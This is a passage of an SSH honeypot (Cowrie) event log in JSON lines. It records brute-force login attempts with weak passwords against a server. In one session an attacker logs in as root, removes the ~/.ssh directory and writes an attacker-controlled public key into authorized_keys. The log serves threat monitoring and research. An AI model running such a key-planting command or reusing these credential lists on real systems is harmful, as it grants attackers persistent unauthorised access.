{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T14:31:33.748079Z","src_ip":"212.227.125.160","session":"320cc5c5d6b7"}
{"eventid":"cowrie.login.failed","username":"dspace","password":"1234567","message":"login attempt [dspace/1234567] failed","sensor":"my-vps","timestamp":"2025-08-28T14:31:34.550923Z","src_ip":"212.227.125.160","session":"320cc5c5d6b7"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:31:35.715033Z","src_ip":"212.227.125.160","session":"320cc5c5d6b7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48212,"dst_ip":"1.2.3.4","dst_port":22,"session":"0bcdd2b20cdf","protocol":"ssh","message":"New connection: 212.227.125.160:48212 (1.2.3.4:22) [session: 0bcdd2b20cdf]","sensor":"my-vps","timestamp":"2025-08-28T14:32:08.424336Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T14:32:08.426806Z","src_ip":"212.227.125.160","session":"0bcdd2b20cdf"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T14:32:08.590241Z","src_ip":"212.227.125.160","session":"0bcdd2b20cdf"}
{"eventid":"cowrie.login.failed","username":"www","password":"123456","message":"login attempt [www/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T14:32:09.085149Z","src_ip":"212.227.125.160","session":"0bcdd2b20cdf"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:32:10.251226Z","src_ip":"212.227.125.160","session":"0bcdd2b20cdf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50872,"dst_ip":"1.2.3.4","dst_port":22,"session":"bc672f98e7ca","protocol":"ssh","message":"New connection: 212.227.125.160:50872 (1.2.3.4:22) [session: bc672f98e7ca]","sensor":"my-vps","timestamp":"2025-08-28T14:32:42.806949Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T14:32:42.807842Z","src_ip":"212.227.125.160","session":"bc672f98e7ca"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T14:32:42.978142Z","src_ip":"212.227.125.160","session":"bc672f98e7ca"}
{"eventid":"cowrie.login.failed","username":"www","password":"password","message":"login attempt [www/password] failed","sensor":"my-vps","timestamp":"2025-08-28T14:32:43.614719Z","src_ip":"212.227.125.160","session":"bc672f98e7ca"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:32:44.787011Z","src_ip":"212.227.125.160","session":"bc672f98e7ca"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":62672,"dst_ip":"1.2.3.4","dst_port":22,"session":"78096696ded4","protocol":"ssh","message":"New connection: 217.72.205.35:62672 (1.2.3.4:22) [session: 78096696ded4]","sensor":"my-vps","timestamp":"2025-08-28T14:32:50.289991Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:32:50.291204Z","src_ip":"217.72.205.35","session":"78096696ded4"}
{"eventid":"cowrie.session.connect","src_ip":"115.190.102.49","src_port":60344,"dst_ip":"1.2.3.4","dst_port":22,"session":"aa4b05aaf24f","protocol":"ssh","message":"New connection: 115.190.102.49:60344 (1.2.3.4:22) [session: aa4b05aaf24f]","sensor":"my-vps","timestamp":"2025-08-28T14:33:18.003522Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T14:33:18.004296Z","src_ip":"115.190.102.49","session":"aa4b05aaf24f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T14:33:18.225347Z","src_ip":"115.190.102.49","session":"aa4b05aaf24f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56376,"dst_ip":"1.2.3.4","dst_port":22,"session":"c7475a301d82","protocol":"ssh","message":"New connection: 212.227.125.160:56376 (1.2.3.4:22) [session: c7475a301d82]","sensor":"my-vps","timestamp":"2025-08-28T14:33:18.766537Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T14:33:18.788939Z","src_ip":"212.227.125.160","session":"c7475a301d82"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T14:33:18.990775Z","src_ip":"212.227.125.160","session":"c7475a301d82"}
{"eventid":"cowrie.login.failed","username":"www","password":"123456789","message":"login attempt [www/123456789] failed","sensor":"my-vps","timestamp":"2025-08-28T14:33:19.612784Z","src_ip":"212.227.125.160","session":"c7475a301d82"}
{"eventid":"cowrie.login.success","username":"root","password":"Welcome","message":"login attempt [root/Welcome] succeeded","sensor":"my-vps","timestamp":"2025-08-28T14:33:20.379806Z","src_ip":"115.190.102.49","session":"aa4b05aaf24f"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:33:20.782804Z","src_ip":"212.227.125.160","session":"c7475a301d82"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T14:33:21.377038Z","src_ip":"115.190.102.49","session":"aa4b05aaf24f"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T14:33:21.377831Z","src_ip":"115.190.102.49","session":"aa4b05aaf24f"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T14:33:21.379243Z","src_ip":"115.190.102.49","session":"aa4b05aaf24f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:33:21.601773Z","src_ip":"115.190.102.49","session":"aa4b05aaf24f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T14:33:23.549160Z","src_ip":"115.190.102.49","session":"aa4b05aaf24f"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T14:33:23.550026Z","src_ip":"115.190.102.49","session":"aa4b05aaf24f"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T14:33:23.774148Z","src_ip":"115.190.102.49","session":"aa4b05aaf24f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:33:23.775457Z","src_ip":"115.190.102.49","session":"aa4b05aaf24f"}
{"eventid":"cowrie.session.connect","src_ip":"115.190.102.49","src_port":60358,"dst_ip":"1.2.3.4","dst_port":22,"session":"1c1dd5d96504","protocol":"ssh","message":"New connection: 115.190.102.49:60358 (1.2.3.4:22) [session: 1c1dd5d96504]","sensor":"my-vps","timestamp":"2025-08-28T14:33:23.975818Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T14:33:23.976691Z","src_ip":"115.190.102.49","session":"1c1dd5d96504"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T14:33:24.192266Z","src_ip":"115.190.102.49","session":"1c1dd5d96504"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T14:33:25.097176Z","src_ip":"115.190.102.49","session":"1c1dd5d96504"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:33:26.315903Z","src_ip":"115.190.102.49","session":"1c1dd5d96504"}
{"eventid":"cowrie.session.connect","src_ip":"115.190.102.49","src_port":39644,"dst_ip":"1.2.3.4","dst_port":22,"session":"ee53cda0be31","protocol":"ssh","message":"New connection: 115.190.102.49:39644 (1.2.3.4:22) [session: ee53cda0be31]","sensor":"my-vps","timestamp":"2025-08-28T14:33:26.545607Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T14:33:26.546290Z","src_ip":"115.190.102.49","session":"ee53cda0be31"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T14:33:27.409318Z","src_ip":"115.190.102.49","session":"ee53cda0be31"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T14:33:28.327333Z","src_ip":"115.190.102.49","session":"ee53cda0be31"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:33:28.547869Z","src_ip":"115.190.102.49","session":"ee53cda0be31"}
{"eventid":"cowrie.session.closed","duration":"10.5","message":"Connection lost after 10.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:33:28.548941Z","src_ip":"115.190.102.49","session":"aa4b05aaf24f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50044,"dst_ip":"1.2.3.4","dst_port":22,"session":"5288ccf39841","protocol":"ssh","message":"New connection: 212.227.125.160:50044 (1.2.3.4:22) [session: 5288ccf39841]","sensor":"my-vps","timestamp":"2025-08-28T14:33:55.963586Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T14:33:55.965916Z","src_ip":"212.227.125.160","session":"5288ccf39841"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T14:33:56.143737Z","src_ip":"212.227.125.160","session":"5288ccf39841"}
{"eventid":"cowrie.login.failed","username":"www","password":"12345","message":"login attempt [www/12345] failed","sensor":"my-vps","timestamp":"2025-08-28T14:33:56.901758Z","src_ip":"212.227.125.160","session":"5288ccf39841"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:33:58.072852Z","src_ip":"212.227.125.160","session":"5288ccf39841"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56808,"dst_ip":"1.2.3.4","dst_port":22,"session":"ac1ea1bef231","protocol":"ssh","message":"New connection: 212.227.125.160:56808 (1.2.3.4:22) [session: ac1ea1bef231]","sensor":"my-vps","timestamp":"2025-08-28T14:34:33.684380Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T14:34:33.685286Z","src_ip":"212.227.125.160","session":"ac1ea1bef231"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","r